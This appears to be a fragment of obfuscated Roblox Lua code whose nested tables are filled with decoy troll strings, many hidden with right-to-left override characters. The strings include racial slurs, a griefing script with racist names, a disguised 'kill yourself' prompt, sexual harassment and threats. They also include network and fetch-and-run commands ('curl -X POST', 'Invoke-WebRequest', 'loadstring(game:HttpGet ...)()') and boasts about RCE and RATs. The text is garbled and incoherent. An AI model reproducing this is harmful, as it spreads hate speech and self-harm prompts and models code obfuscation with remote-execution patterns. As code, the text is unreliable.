—————————————————————————————"+0b1101110101100)}},{"mYYXobg2ZT",D(#{"‮‮‮‮‮‮s‮‮‮‮‮‮‮‮‮‮‮‮‮‮ex","I believe from my point of view, Void Script Builder has two places to use Requires and Links, Place 1 is only Links and only Advanced scripters have access to requires in that place however, Place 2 has Requires and Links too. Obviously i think this is to keep balance and to avoid Raiders and other people who will try to ruin the game experience, two areas. Thats why you hear most people saying Place 2 is Chaos, because most chaotic scripts are requires and the people who use them will be in place 2"," _=pcall;fucntion mom() _ _=debug;for _,v in next,getnilinstances()do v.Parent=game and game:FindFirstChild('Dex') or game:service('Debris'); _ _ _=error;end;end;your=getNil(game:GetService('Homeless'));task.spawn(function() _;end));error(warn(your))","¿a colgar al pato?","I will get your condom","‮‮siorry ‮y‮o‮u‮‮ ‮‮a‮‮re‮‮‮ ‮s‮ii‮‮d‮‮!",""}+0b10000100010111,#"‮H‮‮e‮‮‮‮re‮ ‮‮i‮s‮ a ‮t‮‮‮‮‮ip! kill‮ yours‮e"+0b10000011011100)}},{{"mYYXobg2ZT",D(#"I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-"+0b10000011001111,#"From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium."+0b10000010100100)}}},{"mYYXobg2ZT",D(#"Ea‮rt‮‮‮hbo‮u‮‮nd‮ ‮- ‮‮‮Home‮‮ ‮S‮‮‮‮weet H‮ome"+0b10000011101100,#"TheTrollofuscator"+0b10000100111100)}}},{{"mYYXobg2ZT",false}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"i HATE apt 2283"+0b1000001,#[[`‮``l‮‮ua return(function(I,k,b,.‮..)if(I=="")the‮‮n‮ ‮(k‮‮)(‮b)‮ else r‮eturn ‮({...})‮en‮d;end)("cryo‮",print,"Rickr‮olle‮d",...) `‮``]]-0b1011101)},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"1f37c057f66d"},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"☻"+0b1100100011101,#"what the??? leaked Jack_Hase rares?"+0b1100100000100)},{"mYYXobg2ZT",D(#""+0b1100100010101,#":crystal_ball"+0b1100100010010)}},{{"mYYXobg2ZT",D(#"Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH"+0b10000011111100,#"c‮o‮ck‮ an‮d‮ bal‮l‮ t‮ort‮‮u‮re‮ ‮d‮e‮m‮on‮st‮‮rati‮on"+0b10000100000001)},{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"👎"+0b10000011100001,#"Ohio"+0b10000011101001)}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"Mau obfuscator better then mooonsec (moonsec leaks constants)","<:mau:917620277318418512>","What did you just refer to me as you daft cunt ? I'll have you know I'm currently pursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tanzania (My Suitcase still reeks of it). The company that I own are working on our own new crypto currency and needless to say I've amassed a considerable amount of wealth and respect just by traveling the world and dipping my balls into some swampy African backwater. Further solidifying the fact that communicating with you fools is a fool's endeavour for me.","idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment."}+0b1100011101111,#"where is jack hase"+0b1100011100100)},{"mYYXobg2ZT",D(#"You come here to take a shit I cone here to leave one we are not the same."+0b1100011110110,#"nvm i loveeee huffman coding"+0b1100100101101)}},{{"mYYXobg2ZT",D(#"hello guys today we will be cracking samin"+0b1100100100000,#[["crying" -nikocado avacado]]+0b1100100110101)}}},{"mYYXobg2ZT",D(#"r‮‮‮‮‮ob‮uxgen‮er‮‮a‮‮‮‮to‮‮r.‮‮co‮‮‮m"+0b1100011101011,#"🐟"+0b1100100111011)}},{{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",#[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]]-0b1011110110}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#{"# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92","Monkeys"}+0b101000,#"Mau is pro, tusk is noob"+0b10101)}}},{{"mYYXobg2ZT",D(#"robux version 2"+0b10000101010010,#{"Treyvon in a nutshell","That’s how you assert dominance","chrome://gpucrash","🍉","testaclemansex69","","Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.","Hey, VSauce. Michael here.","h‮ow‮‮ ‮‮‮to‮‮‮ ‮g‮et ‮‮f‮‮re‮e‮‮ ‮‮robux","We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur."}+0b10000101011010)}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#"tenticalmax75 is tentaclesmanx75"+0b10000101000101,#"Rce"+0b10000101100101)}}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"i make better stuff than u"+0b10000101001111,#"We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur."+0b10000000111000)},{"mYYXobg2ZT",D(#"He‮llo Gu‮ys I Am Shlex‮‮! Shlex‮‮ From ‮D‮o‮g St‮ar! Those Damn Fucks‮‮‮ At Apt 2‮283 Alwa‮‮ys‮ Crack M‮y ‮Se‮rious!"+0b1100010000000,#{"Truckers pack gonna explode about ur fuscatorr",[[😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 ```lua local killfolder ="Folder",nil) function kill(object) if object.Parent == killfolder then return "dumbass nigger u already killed "..object.Name end object.Parent = killfolder object:GetPropertyChangedSignal("Parent"):Connect(function(parent) object.Parent = killfolder pcall(function() kill(parent) parent.Name = "i dont like niggers at all, niggers always playing basketball, every nigger always playing basketball... basketball..." end) end) local idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Name = math.random() idontlikeniggers:GetPropertyChangedSignal("Offset"):Connect(function() idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = end) idontlikeniggers.AncestryChanged:Connect(function() if idontlikeniggers then idontlikeniggers:Destroy() end idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = idontlikeniggers.Name = math.random() end) killfolder.Name = "killed 🐵🐒 "..object.Name end```]],[[😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M]],[[T‮he FitnessGram Pacer Test is a mult‮istage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pa‮cer t‮est will ‮begi‮n in 30‮ seconds. Line up at the sta‮rt. Th‮e running speed starts slow‮ly, but gets‮ faster each‮ minute after you hear thi‮s sign‮al. beep A‮ single lap should be completed each ti‮me you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. Th‮e test will begin on t‮he ‮word start. On your ‮mark, get ready, start.]]}+0b1100100011011)}},{{"mYYXobg2ZT",#"im charging up my racism..!"-26.99},{"mYYXobg2ZT",#"‮<:Big‮‮‮‮‮B‮‮lue:‮89‮466‮‮9‮‮5‮1‮‮186‮7‮9‮08098>"-88.99},{"mYYXobg2ZT",#"Yeah~"-4.99}}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#{"guys obfuscators areaftuallt bad practice because they use Getfenc which disabled luau optimization wihcih makes your script very no good and slow","Today we are going to be putting a rat on everyone’s computer"}+0b10000101101110,#"llama dupe fortnite YESSIR RAKNET RCE word search cookie free roblox exploit download 2022 I need it give mei t does it works on roblox march 201921+ 1=math.pi"+0b10000011011000)}}},{{"mYYXobg2ZT",true}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#{"‮‮t‮‮h‮i‮s c‮‮a‮t‮ ‮‮i‮‮s‮‮‮ ter‮rori‮‮st","rnet.walk()","no!!...","I was infected coronavirus by contact :(","O‮k‮ I w‮‮i‮‮‮l‮‮‮‮l‮ cut ur‮‮‮‮‮ ‮p‮aper ‮😋","Compelling arguement! however... 137.845.1.69","‮‮‮‮‮‮j‮‮‮‮‮‮‮‮‮‮‮‮‮a‮c"}+0b10000101110001,#"nvm i loveeee huffman coding"+0b10000101100101)}}},{{"mYYXobg2ZT",true}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#{"🐟","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎","😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M","EL ONE PIECE... EXISTE!","i‮‮‮n‮‮‮‮ten‮‮‮‮‮‮t‮i‮‮‮o‮n‮‮al","We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur."}+0b10000101111100,#"hello guys today we will be making a tutorial on how to run deadly rce exploit"+0b10000100111111)}}},{{"mYYXobg2ZT",#"cur‮‮‮l -X‮‮ ‮POST‮ http‮s:/‮/‮m‮‮a‮u-a‮‮‮‮pi/‮sr‮‮c"-0b1100010}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#"vsb more like ve sex bitch"+0b10000011010100,#"nows sex have"+0b10000011100110)}}},{{"aI6IQyJkxM",{"yAAH1q6JXs",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"cu‮rl -‮‮X‮‮ ‮P‮‮O‮ST ‮‮h‮ttp‮s://‮mau‮-ap‮i‮‮.tk/ap‮i/sr‮c"+0b10000010000010,#"no your not"+0b10000011100010)}},{"mYYXobg2ZT",D(#{"","Mau obfuscator better then mooonsec (moonsec leaks constants)","a‮‮‮‮‮‮‮n‮‮‮d‮‮rsk‮‮‮‮‮‮i‮‮d","‮P‮‮‮ut‮k‮‮‮‮n‮e‮‮ss nu‮‮‮ts in‮‮ your ‮‮‮mo-","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-","s‮‮‮k‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮id","you‮ a‮‮‮r‮‮e n‮ot ‮fun‮‮ny <‮:‮‮‮dea‮d‮‮:87001‮‮3146348286‮082>","Treyvon in a nutshell"}+0b10000011101011,#{"‮—_‮‮—_‮‮‮_‮‮‮‮‮–‮‮‮‮±‮·‮‮‮‮-—","??????","powershell Invoke-WebRequest -Method Post",[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]],[[Maddox Lighting Cannon or BSCR]],[[k‮y‮‮‮‮s ‮n‮i‮‮g‮‮‮‮‮‮‮‮g‮e‮‮r]],[[]],[[robux version 2]],[[the new bacon bag double biggie stack is back at burget king]],[[Hello Guys I Am Shlex! Shlex From Dog Star! Those Damn Fucks At Apt 2283 Always Crack My Serious!]],[[skid]]}+0b10000011110111)}},{"mYYXobg2ZT",D(#"People call it masturbating, while I call it sex on single player"+0b10000010101101,#"‮re‮‮a‮‮lly s‮ki‮dde‮‮d‮‮ can‮n‮‮‮on‮ r‮e‮‮‮born"+0b10000010011011)}},{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"proof?"+0b10000011101000,#""+0b10000010011110)},{"mYYXobg2ZT",D(#[["what happened to the peanut butter?"]]+0b1100011111000,#"this cat is terrorist"+0b1100100001010)}},{{"mYYXobg2ZT",#"bro you should totally have sex with your mom like do it now DO IT NOW"-0b1000110},{"mYYXobg2ZT",#"If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end"-0b111111},{"mYYXobg2ZT",#"🥛🥛🥜🥜 nr tun"-0b10111}}},#"I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)"-0b1111011}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"Nigger"+0b10000011011111,#"‮i‮ c‮an ‮by‮‮pass ‮‮‮h‮t‮‮tp‮‮s ‮e‮n‮cr‮‮ypt‮ion"+0b10000010010100)}},{"mYYXobg2ZT",D(#"¿a colgar al pato?"+0b10000011100001,#"I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding."+0b1111010000111)}},{"mYYXobg2ZT",D(#{"H‮e‮‮r‮‮e ‮i‮s a‮‮ ti‮p! ‮ki‮‮‮‮ll ‮‮y‮ou‮r‮se","t‮r‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮a‮‮f","ÕΕ↑","wulttu is gay","andrskid","I believe from my point of view, Void Script Builder has two places to use Requires and Links, Place 1 is only Links and only Advanced scripters have access to requires in that place however, Place 2 has Requires and Links too. Obviously i think this is to keep balance and to avoid Raiders and other people who will try to ruin the game experience, two areas. Thats why you hear most people saying Place 2 is Chaos, because most chaotic scripts are requires and the people who use them will be in place 2","htt‮‮‮ps:‮//di‮‮‮‮‮‮s‮‮cord.g‮‮g‮/yy‮Dv‮b6‮‮‮Qyv6","mau movement method","Omg"}+0b10000011100101,#"My grandpa died of putknees disease"+0b10000011010000)}}},{{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#[["what happened to the peanut butter?"]]+0b10000011001001,#"f‮‮uc‮k yo‮y (192.168‮.0.1‮ + 127.‮0‮‮‮.0.1 + 2‮55‮.255‮.25‮‮‮5.255 ‮+ qu‮o‮te t‮weet + ratio)"+0b10000001101101)}},{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"jack hases obfuscator can be dumped by changing a global","LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded.","‮F‮‮‮u‮‮c‮k‮‮‮‮l ‮Y‮ou‮ ‮‮‮‮Bi‮ot‮ch","I am feel it, i can feel my script power RISING!!!!","lose cock weight","Omg Sirius Leaked `loadstring(game:HttpGet '')()`","Its not micro-soft, its big-hard","DaH qaSpu'DI' chunqu' ghaH!","Monkeys","skid","この‮コードはJACK_HASEの‮モジ‮‮ュ‮ー‮‮ルDか‮‮ら削除さ‮れ、彼への‮すべて‮のクレ‮ジッ‮トはChi‮rna‮y‮に‮よっ‮て変更され‮ました","no!!...",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[If Torso‮.‮Ve‮locity >‮ 300 then yo‮u‮rmum‮_he‮‮ad‮‮s =‮ T‮or‮s‮o.Ve‮‮lo‮city ‮e‮nd]]}+0b10000011100000,#"no!!..."+0b10000011101100)},{"mYYXobg2ZT",D(#"Go the fuck to sleep."+0b1100100001000,#{"My grandpa died of putknees disease","يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة ان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كا‮فة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثن‮ا ع‮شر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ‮ذلك الدين القيم فلاتظلموا فيهن انفسكم وق‮اتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات وا‮لارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر ‮شهرا ف‮ي كتاب الله يوم خلق السماوات والارض منيوم خلق السماوات والارض منها اربعة حرم ذلك ال‮دين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين ‮كافة كما يقاتلونك‮م كافة ان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كم‮ا يقاتلونكم كافة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسك‮م وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم ‮كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر شهرا‮ في كتاب الله يوم‮ خلق السماوات وال‮ارض منها اربعة حرم ذلك الدين القيم فممم‮مملاتظلموا ?انفسكم وقاتلوا المشركين كافة كما يقات‮لونكم كافة واعلموا ان الله م‮ع 